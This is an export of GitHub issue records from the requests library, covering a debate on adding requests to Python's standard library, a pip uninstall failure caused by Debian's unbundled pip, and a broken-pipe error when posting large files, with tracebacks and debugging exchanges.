[ "Yes, because it simplifies the entire process and does not sacrifice the performance. So yes.\n", "- What kind of impact would this have on Requests' ability to evolve and grow?\n- Does Requests' release frequency jive with that of Python's? A big difference here might be a good indication that stdlib isn't the right home for Requests.\n", "Let's CC some people whose opinions we care strongly about:\n\n@shazow @kevinburke @dstufft @alex @sigmavirus24\n", "What happened to \"the standard lib is where things go to die\"?\n", "The release cadence question is a good one; I'd be concerned about losing request's ability to evolve freely. That said, perhaps a requests core library would be a good fit.\n", "My 2 $CURRENCY's worth:\n\nI would be disinclined to do it. I think being outside the standard library has given us the freedom to make choices that benefit our users without being stuck behind core dev's policies for version support and release. It allows us to respectfully disagree with the priorities of core dev. And it allows us to make decisions that are ideological, which has been the lifeblood of this project for more than three years.\n\nI think the reality is that if this module enters the standard library the current core team will move on from it. I certainly have little interest following it into the quagmire that is core dev. The most likely to steward requests in the stdlib is @sigmavirus24, and he's just one man. That loss of direction will inevitably lead to an erosion of the library's interface over time, and I think that would be a tragic thing.\n\nThe only thing that being in the standard library gives us is our time back. That's a good reason to put it there, if that's what you think it needs, but I don't think we should pretend that it will make the library or the Python ecosystem any better.\n", "I don't think you actually _can_ add requests to the stdlib without first adding chardet and urllib3 or removing your dependency on them. There's also the thing where Python doesn't want to ship a CA Bundle so you'd need to modify it so that it uses the system platform bundle as Python does naturally now.\n\nBesides that, I'm not sure. It would certainly make it easier to get requests, however part of my work on pip is basically to make it so it's easy to get things like requests without needing to add it to the stdlib. On top of that it's also somewhat confusing to have multiple ways to make HTTP requests in the Python stdlib. The unification of urllib and urllib2 was a good thing in the Python stdlib and I don't think that re-adding that with urllib.request and \"requests\" is a good idea either. Finally I don't think it would actually help many people, this would only go into 3.5+ so anyone who wants to use requests would have to either use the version that is on PyPI or making 3.5 their minimum supported Python version which I don't think is a realistic thing to happen in any near future.\n", "While I think having Requests in the standard library would help new users I don't know that it would help the Python community as a whole. Experienced users know to use Requests and know how to install it.\n\nI'd be especially concerned with the chilling effect it would have on new development as others would be disinclined to contribute, knowing that they wouldn't see their contributed changes in an easily-usable release for a long time. \n\nWhat about the middle ground of making Python distributions ship with it installed by default?\n", "No it wouldn’t.\n\nrequests is absolutely unsuitable for stdlib inclusion for the many reasons stated before me. The urllib3 dependency alone is a complete showstopper; we don’t want it to got to die in the stdlib.\n\nWhat _would_ be useful is to add something _basic_ and similar to requests built on top of stdlib’s current http resources that allows users to do simple get/post requests to https without practicing blood magic.\n\nAlso kind reminder that it would be added to Python 3 only. :) (and not earlier than Python 3.6).\n\nAre you getting tired of maintaining it Kenneth? ;)\n", "I don't think we can even begin to discuss this question without someone saying what becomes of httplib, urllib, and friends. Adding requests without addressing the complexity of choice is, I think, worse than the answer \"ignore teh stdlib, just use requests\". It's a regression to the days of urllib, urllib2.\n", "> I think the reality is that if this module enters the standard library the current core team will move on from it. I certainly have little interest following it into the quagmire that is core dev. The most likely to steward requests in the stdlib is @sigmavirus24, and he's just one man. That loss of direction will inevitably lead to an erosion of the library's interface over time, and I think that would be a tragic thing.\n\nI would wander into the stdlib to try to help, but given the fact that exactly one of I don't know how many previous patchsets I've submitted has been accepted and one other _reviewed_ makes me wary of wanting to bother with that process. I know the core devs are entirely swamped by more important things. I also know someone else has decided randomly that they want to maintain httplib/http but they're clearly not suited for the job (yet) and I don't have the patience to work on httplib when patches that both @Lukasa and I sit around, unreviewed, and not cared about (when they fix pressing issues with the library).\n\nI'd probably end up just forking requests to continue using it.\n\n> requests is absolutely unsuitable for stdlib inclusion for the many reasons stated before me. The urllib3 dependency alone is a complete showstopper; we don’t want it to got to die in the stdlib.\n\nIt's always been a contention of @kennethreitz (and therefore, the project as a whole) that urllib3 is an implementation detail. Many of requests' biggest features are handled entirely by urllib3, but it doesn't mean they couldn't be reimplemented with care into truly dependency-less library.\n\nRegarding the chardet dependency: it's been nothing but a headache to us (and to me specifically). It used to have separate codebases for py2 and py3 until I got it into a single codebase library (which has only in the last several months been merged back into chardet proper). The library is slow and a huge memory hog (which angers many people to the point of yelling at us here on the issue tracker). It's not entirely accurate and Mozilla's universalchardet that it is modeled after has all but been abandoned by Mozilla. So removing chardet would probably be a net positive anyway.\n\nRegarding whether we should do this or not, I'm frankly unconcerned. Whatever would be in the stdlib would end up being requests in API only. The Python 3 adoption rate is slow enough that I don't think people will be meaningfully affected by this for the next N years (where N is the globally unknown number of years for 3.5 to be used in production by corporations).\n\nAnd like I said, I'd probably end up just forking requests or using urllib3 directly at that point.\n", "I discussed this at length with Guido the other day — chardet would have to be included first. I think that urllib3 and requests could be included into the http package together. \n\nHowever, I'm very inclined to agree with @hynek and @dstufft. Perhaps requests is fine just the way it is :)\n", "Either way, if you have an opinion that you'd like to share, you are welcome to share it here (or anytime really). \n\n:sparkles: :cake: :sparkles:\n", "Also, adding a new http module to the stdlib with no asyncio-story seems\nbonkers to me.\n\nOn Sun Jan 25 2015 at 1:15:51 PM Kenneth Reitz [email protected]\nwrote:\n\n> Either way, if you have an opinion that you'd like to share, you are\n> welcome to share it here (or anytime really).\n> \n> [image: :sparkles:] [image: :cake:] [image: :sparkles:]\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2424#issuecomment-71384152\n> .\n", "> I don't think we can even begin to discuss this question without someone saying what becomes of httplib, urllib, and friends\n\nThis is my issue. I think the current confusing state of affairs has to be sorted out first.\n", ":+1: :metal:\n", "Just to be clear, my above comment about re-implementing urllib3 for inclusion in the stdlib shouldn't be taken lightly. The amount of work necessary to do that would be immense because urllib3 is the product of (likely 10 or more) years of developer work.\n", "I too have spoken with Guido about tossing urllib3 into the stdlib some years ago with the conclusion that it's not a great idea, but I'm fairly neutral about it at this point.\n\nurllib3's API has been mostly-stable and pretty much completely backwards compatible for several years now. Its' pace is possibly even slower than that of the stdlib today, with the vast majority of changes being minor fixes or security improvements (with occasional backwards-compatible feature additions like granular timeouts/retries). If somebody really wanted to try and get urllib3 into the standard library, I don't think it's a terrible idea—it's just not the _best_ idea.\n\n(I'm not speaking for requests, as it moves at a very different pace with different goals than urllib3.)\n\nThe best idea, in my opinion, would be for the PSF to hire (or maybe Kickstart or something) 1-3 developers to build out a brand new http library on top of asyncio with HTTP/2 support with heavy inspiration from urllib3, requests, and hyper. I'd be happy to see as much code taken verbatim as possible but laid out in a consistent, modular, and reusable manner. Ideally target Python 4 or something, and get rid of all the urllibs and httplibs. I expect this would be 6-9mo of hard work, but possibly more.\n\nThe very worst part about urllib3, which I'd love to see replaced if somebody attempts to rewrite it per @sigmavirus24's suggestion, is that it depends on httplib. urllib3's functionality is substantially limited with lots of code spent working around shortcomings of httplib. Though if HTTP/2 support would be taken seriously in this goal, then the scope of re-implementing HTTP/1.1 would be a very comforting fraction of the work required.\n\nMany PyCons ago, a bunch of us met up and whiteboarded a layout of a brand new http library that refactors all the pieces into the ideal arrangement we could imagine at the time. I'd be happy to dig up these notes if anyone is going to attempt this.\n", "+1 @shazow\n\nAgain, if anyone finds themselves with the time and inclination to take on that fairly large project, I've sketched out a putative API design that might make a good starting point.\n", "Yes because the only way I will ever allow requests as a dependency is if its in stdlib.\n\nThat said, urllib3 contains the features that people really want, so having that in stdlib is enough for me\n", "Do you not use any dependencies? \n", "@dstufft this is in projects that generally don't, where everyone can't be bothered to figure out how to use urllib. (people aren't adding it as a dep because of ssl/etc generally, but out of laziness)\n", "@dstufft also multi-version deps basically make it hard to use things in libraries. You probably want to use requests in your project and if we require it then there's a potential for a world of hurt if API changes happen in versions.\n", "While I appreciate some people wanting to develop dependencies without dependencies on other software that hasn't changed its API in years, this isn't the place for the discussion.\n", "@sigmavirus24 I disagree. requests has had its API change in the past. APIs change, thats why we have versioning, thats why dependencies are complex. This is a perfect case for that discussion because requests is a dependency in a lot of projects.\n\nIf you move into the stdlib the API must be stable.\n", "@dcramer the API broke exactly once, in 1.0. APIs do change, but requests' API isn't planning any changes either. The only change we've had is adding the `json` parameter which doesn't break anything. You can keep trying to accuse us of breaking the API too much, but when projects like OpenStack have had requirements defined as `>=1.2.3` for a long time, I think that says a lot about the stability of requests. The API has been stable, precisely because after we cut 1.0 we rejected all new additions to the API (with the obvious recent exception of adding a `json` param) and we've been very strict about not breaking the API. If you're not a consumer of requests, you wouldn't know this though. So I don't take your ignorance personally.\n", "Further if the stdlib API is supposedly so stable, explain why argparse broke it's public API between Python 3.3 and 3.4?\n", "@sigmavirus24 you're now purely turning this into an API debate. I was just pointing out the reason I dont include it is because it can change, and everyone uses it, and everyone uses different versions. It's great that you guys never change your API but I have no desire or time to follow it or assume thats true.\n", "You know Python changes it's API too, quite often actually, sometimes in very major ways, perhaps you've heard of Python 3?\n", "Well i'm leaving this debate. I made my opinions clear. Not sure what you're all bitching about.\n" ]
https://api.github.com/repos/psf/requests/issues/2423
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2423/labels{/name}
https://api.github.com/repos/psf/requests/issues/2423/comments
https://api.github.com/repos/psf/requests/issues/2423/events
https://github.com/psf/requests/issues/2423
55,359,316
MDU6SXNzdWU1NTM1OTMxNg==
2,423
requests 2.5.0 uninstall fails
{ "avatar_url": "https://avatars.githubusercontent.com/u/715626?v=4", "events_url": "https://api.github.com/users/dsoprea/events{/privacy}", "followers_url": "https://api.github.com/users/dsoprea/followers", "following_url": "https://api.github.com/users/dsoprea/following{/other_user}", "gists_url": "https://api.github.com/users/dsoprea/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/dsoprea", "id": 715626, "login": "dsoprea", "node_id": "MDQ6VXNlcjcxNTYyNg==", "organizations_url": "https://api.github.com/users/dsoprea/orgs", "received_events_url": "https://api.github.com/users/dsoprea/received_events", "repos_url": "https://api.github.com/users/dsoprea/repos", "site_admin": false, "starred_url": "https://api.github.com/users/dsoprea/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/dsoprea/subscriptions", "type": "User", "url": "https://api.github.com/users/dsoprea", "user_view_type": "public" }
[]
closed
true
null
[]
null
12
2015-01-24T05:09:41Z
2021-09-08T23:06:03Z
2015-01-24T16:20:51Z
CONTRIBUTOR
resolved
Installing the latest (2.5.1) or 2.5.0 (in the examples, below), installs a version that can't be uninstalled or upgraded, though it imports without a problem. I show how 2.2.0 (my previous version) didn't have this problem. Install 2.5.0: ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ sudo pip install requests==2.5.0 Downloading/unpacking requests==2.5.0 Downloading requests-2.5.0-py2.py3-none-any.whl (464kB): 464kB downloaded Installing collected packages: requests Successfully installed requests Cleaning up... ``` Can successfully import: ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ python Python 2.7.6 (default, Mar 22 2014, 22:59:56) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import requests >>> ``` Can't uninstall, though: ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ sudo pip uninstall requests Traceback (most recent call last): File "/usr/bin/pip", line 9, in <module> load_entry_point('pip==1.5.4', 'console_scripts', 'pip')() File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 519, in load_entry_point return get_distribution(dist).load_entry_point(group, name) File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 2630, in load_entry_point return ep.load() File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 2310, in load return self.resolve() File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 2316, in resolve module = __import__(self.module_name, fromlist=['__name__'], level=0) File "/usr/lib/python2.7/dist-packages/pip/__init__.py", line 11, in <module> from pip.vcs import git, mercurial, subversion, bazaar # noqa File "/usr/lib/python2.7/dist-packages/pip/vcs/mercurial.py", line 9, in <module> from pip.download import path_to_url File "/usr/lib/python2.7/dist-packages/pip/download.py", line 25, in <module> from requests.compat import IncompleteRead ImportError: cannot import name IncompleteRead ``` Cleanup, manually: ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ sudo rm -fr requests* ``` Installing 2.2.0 (the okay version): ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ sudo pip install requests==2.2.0 Downloading/unpacking requests==2.2.0 Downloading requests-2.2.0-py2.py3-none-any.whl (623kB): 623kB downloaded Installing collected packages: requests Successfully installed requests Cleaning up... ``` Uninstalls, fine: ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ sudo pip uninstall requests Uninstalling requests: /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/DESCRIPTION.rst /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/METADATA /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/RECORD /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/WHEEL /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/pydist.json /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/top_level.txt /usr/local/lib/python2.7/dist-packages/requests/__init__.py /usr/local/lib/python2.7/dist-packages/requests/__init__.pyc /usr/local/lib/python2.7/dist-packages/requests/adapters.py ... /usr/local/lib/python2.7/dist-packages/requests/sessions.pyc /usr/local/lib/python2.7/dist-packages/requests/status_codes.py /usr/local/lib/python2.7/dist-packages/requests/status_codes.pyc /usr/local/lib/python2.7/dist-packages/requests/structures.py /usr/local/lib/python2.7/dist-packages/requests/structures.pyc /usr/local/lib/python2.7/dist-packages/requests/utils.py /usr/local/lib/python2.7/dist-packages/requests/utils.pyc Proceed (y/n)? y Successfully uninstalled requests ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2423/reactions" }
https://api.github.com/repos/psf/requests/issues/2423/timeline
null
completed
null
null
false
[ "This isn't our fault I don't think: your exception comes from pip. @dstufft?\n", "## This looks like you installed pip using your system package manager and it needs a version of requests installed. \n\nSent from my Android device with K-9 Mail. Please excuse my brevity.\n", "Yea what @sigmavirus24 said. Some systems unbundle requests from pip.\n", "@dstufft is this maybe related to debian preventing pip from removing packages installed by the system package manager?\n", "No, I think it's just because Debian unbundles requests. So whatever version of requests you install to the system needs to be compatible with what pip expects.\n", "Interesting that there's a difference in our compat module between 2.2.0 and 2.5.0.\n", "Seems it was removed in https://github.com/kennethreitz/requests/commit/47d0517d66e8cf5832768262221f0357ae134ad1\n\nI assume pip has already worked around this?\n", "pip itself doesn't use it anymore, but the version of pip that Debian has in it's system packages is older than when we worked around it.\n", "Yeah, so I'm pretty sure this is one of those cases where we shouldn't have let @jschneier remove that import in `requests.compat` (our fault) mixed with the constant of \"`sudo pip install x` is evil; use virtualenvs\".\n\nWe _could_ add the import back, but I would then mark it for deletion in 3.0 so this problem would just pop up again. So I'm going to close this since there's no solution that won't result in further breakage of other packages down the road.\n", "Interesting. Thanks for considering the issue. So it's generally considered bad to install _PIP_ via the OS's package manager?\n", "It's generally considered _best_ practice to do development inside of `virtualenv`s and in some cases, deploy inside of them as well so inter-application dependencies don't conflict with each other (unless you have a very sophisticated way of ensuring that two applications relying on the same dependencies don't break). Using the operating system's package manager for certain things (like `pip`) is okay _most_ of the time. It totally depends on what you're doing. With that said, this ticket isn't the place to discuss in depth downstream redistributors of python packages or what happens when they package python software.\n", "I agree with the _virtualenv_ usage. I didn't realize that was decoupled\nfrom the OS's version of _pip_ (how else would it even be available?).\n\nDustin\n\nOn Mon, Jan 26, 2015 at 9:20 AM, Ian Cordasco [email protected]\nwrote:\n\n> It's generally considered _best_ practice to do development inside of\n> virtualenvs and in some cases, deploy inside of them as well so\n> inter-application dependencies don't conflict with each other (unless you\n> have a very sophisticated way of ensuring that two applications relying on\n> the same dependencies don't break). Using the operating system's package\n> manager for certain things (like pip) is okay _most_ of the time. It\n> totally depends on what you're doing. With that said, this ticket isn't the\n> place to discuss in depth downstream redistributors of python packages or\n> what happens when they package python software.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2423#issuecomment-71466842\n> .\n" ]
https://api.github.com/repos/psf/requests/issues/2422
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2422/labels{/name}
https://api.github.com/repos/psf/requests/issues/2422/comments
https://api.github.com/repos/psf/requests/issues/2422/events
https://github.com/psf/requests/issues/2422
55,284,235
MDU6SXNzdWU1NTI4NDIzNQ==
2,422
Broken pipe Exception
{ "avatar_url": "https://avatars.githubusercontent.com/u/1229983?v=4", "events_url": "https://api.github.com/users/cloverstd/events{/privacy}", "followers_url": "https://api.github.com/users/cloverstd/followers", "following_url": "https://api.github.com/users/cloverstd/following{/other_user}", "gists_url": "https://api.github.com/users/cloverstd/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/cloverstd", "id": 1229983, "login": "cloverstd", "node_id": "MDQ6VXNlcjEyMjk5ODM=", "organizations_url": "https://api.github.com/users/cloverstd/orgs", "received_events_url": "https://api.github.com/users/cloverstd/received_events", "repos_url": "https://api.github.com/users/cloverstd/repos", "site_admin": false, "starred_url": "https://api.github.com/users/cloverstd/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/cloverstd/subscriptions", "type": "User", "url": "https://api.github.com/users/cloverstd", "user_view_type": "public" }
[ { "color": "e11d21", "default": false, "description": null, "id": 136589914, "name": "Needs Info", "node_id": "MDU6TGFiZWwxMzY1ODk5MTQ=", "url": "https://api.github.com/repos/psf/requests/labels/Needs%20Info" } ]
closed
true
null
[]
null
61
2015-01-23T14:03:14Z
2016-11-30T09:12:06Z
2015-04-11T02:58:50Z
NONE
null
I post a large file to server, and it raise `ConnectionError` exception. ``` Traceback (most recent call last): File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/rq/worker.py", line 479, in perform_job rv = job.perform() File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/rq/job.py", line 466, in perform self._result = self.func(*self.args, **self.kwargs) File "./jobs/office.py", line 97, in notice_file open('test.pdf', 'rb'))) File "/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/enterprise/client/api/media.py", line 15, in upload 'media': media_file File "/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/api/base.py", line 20, in _post return self._client._post(url, **kwargs) File "/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/base.py", line 74, in _post **kwargs File "/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/base.py", line 39, in _request **kwargs File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/api.py", line 49, in request response = session.request(method=method, url=url, **kwargs) File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/sessions.py", line 461, in request resp = self.send(prep, **send_kwargs) File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/sessions.py", line 573, in send r = adapter.send(request, **kwargs) File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/adapters.py", line 415, in send raise ConnectionError(err, request=request) ConnectionError: ('Connection aborted.', error(32, 'Broken pipe')) ``` The `test.pdf` is 4.2M, when I post it as a file, I get ConnectionError Exception. But I use curl to post it to server, it can be uploaded successful.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2422/reactions" }
https://api.github.com/repos/psf/requests/issues/2422/timeline
null
completed
null
null
false
[ "Can you reproduce it every time? What curl command are you using? Does the\nserver have any useful log messages?\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Fri, Jan 23, 2015 at 6:03 AM, Cloverstd [email protected] wrote:\n\n> I post a large file to server, and it raise ConnectionError exception.\n> \n> Traceback (most recent call last):\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/rq/worker.py\", line 479, in perform_job\n> rv = job.perform()\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/rq/job.py\", line 466, in perform\n> self._result = self.func(_self.args, *_self.kwargs)\n> File \"./jobs/office.py\", line 97, in notice_file\n> open('test.pdf', 'rb')))\n> File \"/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/enterprise/client/api/media.py\", line 15, in upload\n> 'media': media_file\n> File \"/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/api/base.py\", line 20, in _post\n> return self._client._post(url, *_kwargs)\n> File \"/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/base.py\", line 74, in _post\n> *_kwargs\n> File \"/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/base.py\", line 39, in _request\n> *_kwargs\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n> response = session.request(method=method, url=url, *_kwargs)\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n> resp = self.send(prep, *_send_kwargs)\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n> r = adapter.send(request, *_kwargs)\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n> raise ConnectionError(err, request=request)\n> ConnectionError: ('Connection aborted.', error(32, 'Broken pipe'))\n> \n> The test.pdf is 4.2M, when I post it as a file, I get ConnectionError\n> Exception.\n> But I use curl to post it to server, it can be uploaded successful.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2422.\n", "Have you tried without using `rq`? Are you using curl within `rq`?\n", "Same here. I'm using requests to post large files (about 8 Mb in total) to a Django endpoint. Getting same error. It does work fine with smaller files.\n", "@barseghyanartur perhaps you can give us more details than @cloverstd did, for example, what code will reproduce this?\n\nI have a suspicion as to the cause but I haven't been able to reproduce this yet.\n", "@sigmavirus24 \n\nI have gone a bit further in research and this is what I have found.\n\nBasically, it's this:\n\n```\nrequests.post(some_url, data=data_dict, files=files_dict)\n```\n\nEnvironment details:\n- Python==2.7.3\n- requests==2.5.1\n\nI managed to reproduce the problem exactly. In my case, the endpoint is a multi-lingual Django site. Requests to URL without the language prefix (like \"http://example.com/foo/endpoint/\") do get redirected to the same URL with the language prefix (like \"http://example.com/en/foo/endpoint/\").\n\nIf `some_url` is \"http://example.com/foo/endpoint/\" I get an error:\n\n('Connection aborted.', error(32, 'Broken pipe'))\n\nIf `some_url` is \"http://example.com/en/foo/endpoint/\" it all goes fine. Likely, `requests` doesn't handle large post requests to endpoints which do redirect them to some other endpoints.\n\nI have just tried it with requests==2.6.0 and I do get the same problem.\n", "@barseghyanartur can you give us the status code from the redirect?\n", "I wonder if the remote end isn't expecting a body but we're sending it anyway, so we get our connection torn down.\n", "@Lukasa or if we change the method (i.e., in a case like 7231 Section 6.6.4) without stripping the body/content-length. (or strip the body and not the content-length).\n", "Really any information @barseghyanartur can give us about the redirect response and the subsequent request will be helpful\n", "@sigmavirus24 \n\nHey, thanks for getting back on this. I'll post it here quite soon after I get home. :) That's gonna be in about 5 hours.\n", "@barseghyanartur no rush. I'd like to fix this once and for all. That can be today or next week. As long as it's fixed, I'll be happy.\n", "@sigmavirus24 \n\nI don't get any response back, since it fails hard.\n\n``` py\nTraceback (most recent call last):\n File \"requests_test.py\", line 29, in <module>\n response = requests.post(url, data=data, files=files)\n File \"/home/me/.virtualenvs/env/local/lib/python2.7/site-packages/requests/api.py\", line 108, in post\n return request('post', url, data=data, json=json, **kwargs)\n File \"/home/me/.virtualenvs/env/local/lib/python2.7/site-packages/requests/api.py\", line 50, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/home/me/.virtualenvs/env/local/lib/python2.7/site-packages/requests/sessions.py\", line 464, in request\n resp = self.send(prep, **send_kwargs)\n File \"/home/me/.virtualenvs/env/local/lib/python2.7/site-packages/requests/sessions.py\", line 576, in send\n r = adapter.send(request, **kwargs)\n File \"/home/me/.virtualenvs/env/local/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n raise ConnectionError(err, request=request)\nrequests.exceptions.ConnectionError: ('Connection aborted.', error(32, 'Broken pipe'))\n```\n\nAnd this is the code:\n\n``` py\nimport os\n\nimport requests\n\nurl = 'http://localhost:8001/foo/endpoint/'\n\ndata = dict(['input_{0}'.format(index), 'some value {0}'.format(index)] for index in range(10))\n\nFILES = (\n '/home/me/bbrepos/requests_test/media/1.gif',\n '/home/me/bbrepos/requests_test/media/2.gif',\n)\n\nfiles = dict(['file_{0}'.format(index), (os.path.basename(file_path), open(file_path, 'rb'))] for index, file_path in enumerate(FILES))\n\nresponse = requests.post(url, data=data, files=files)\n```\n", "@barseghyanartur you can determine what the redirect codes, etc. are with `requests.post(url, data=data, files=files, allow_redirects=False)`\n", "@sigmavirus24 \n\nAh, sorry, I didn't realise you were asking for that. It was 301, as far as I remember.\n", "Given that this is all plaintext, you should be able to get a packet capture of the whole transaction. Running `tcpdump -nnvvXSs 1514 port 8001 and host localhost` should do the trick.\n", "I'm having the same problem: small (1MB) data works, but large (50MB) data breaks ('Connection aborted.', error(32, 'Broken pipe')). \n\nThe complications in my case are that (1) I don't control the Web service -- it's the property of another company; (2) the protocol is HTTPS, but perhaps the packet capture would still be informative, even if the payload data is encrypted from tcpdump's point of view.\n\nI will get a packet capture of a broken large transaction and reply back.\n", "I created the tcpdump file https://gist.github.com/JazzFan/fc55e28c525518ada71f with this command:\n `sudo tcpdump -nnvvXSs 1514 port 443 and host 54.200.58.94`\n\nMy program ran under Python 2.7.8, with `requests` 2.5.3 (but I feel pretty confident that I can get it to break under other versions of Python or `requests`, if you would prefer others).\n\nThe relevant lines of the Python program:\n\n```\n import requests\n ...\n headers = {'Content-Type': 'application/json'}\n response = requests.post(URL, data=wrapped_chunk, headers=headers)\n```\n\nThe idea of the program is to split a large file into 50MB chunks, wrap each chunk with a bit of JSON, then POST it to the Web service API that a vendor company provides to my company.\n\nThe stack trace (home dir redacted with `~`)\n\n```\nTraceback (most recent call last):\n File \"~/bin/progname.py\", line 399, in <module>\n main()\n File \"~/bin/single_process.py\", line 33, in _\n return f(*a, **kw)\n File \"~/bin/progname.py\", line 392, in main\n max_return_code = send_file_chunks(fn, api_key, args.parallelism)\n File \"~/bin/progname.py\", line 347, in send_file_chunks\n chunk_filenames))\n File \"~/anaconda/envs/py278/lib/python2.7/multiprocessing/pool.py\", line 251, in map\n return self.map_async(func, iterable, chunksize).get()\n File \"~/anaconda/envs/py278/lib/python2.7/multiprocessing/pool.py\", line 558, in get\n raise self._value\nrequests.exceptions.ConnectionError: ('Connection aborted.', error(32, 'Broken pipe'))\n```\n\nI realize the stack trace has everything but `requests` in it; let me know if that's a problem and I'll write a simpler program in order to get a clean stack trace.\n", "@jazzfan thanks for doing that. I'll look tonight and I suspect that @Lukasa will look when he wakes up\n", "@sigmavirus24 You forget that I am in NYC at the minute, and so am (relatively) awake!\n\nAs I've said elsewhere, EPIPE almost always comes when we attempt to send on a connection that has been remote-closed.\n\nI think it would be most interesting if you could run a patch in requests' vendored copy of urllib3 that would throw the socket object up with the `ConnectionError`, and then read from it. The exact patch to apply here is a bit unclear and overlaps with some other stuff we've been thinking about when it comes to EPIPE.\n\nAlternatively, a non-SSL repro would work!\n", "@Lukasa, does this mean that the SSL tcpdump file is essentially useless? Also, I'm afraid I'm too much of a newbie to be able to figure this patch you're describing, especially if it's unclear to you. \n\nI guess I'll rig up some kind of little test HTTP server on my localhost and see if I can reproduce the error using that.\n", "@JazzFan Sadly, it's not very easy to tell from it whether or not a response was sent. That said, we can definitely see that the remote end tore the connection down at 15:17:24.141410 (sending a TCP FIN). Shortly thereafter we emitted another packet, which caused the remote end to send a barrage of TCP RSTs (though most of these appear to be retransmits, and in practice appear to be in response to the other TCP packets that were in flight when the FIN was emitted (as shown by the sequence/acknowledgement numbers).\n\nWhat we really want to understand is what 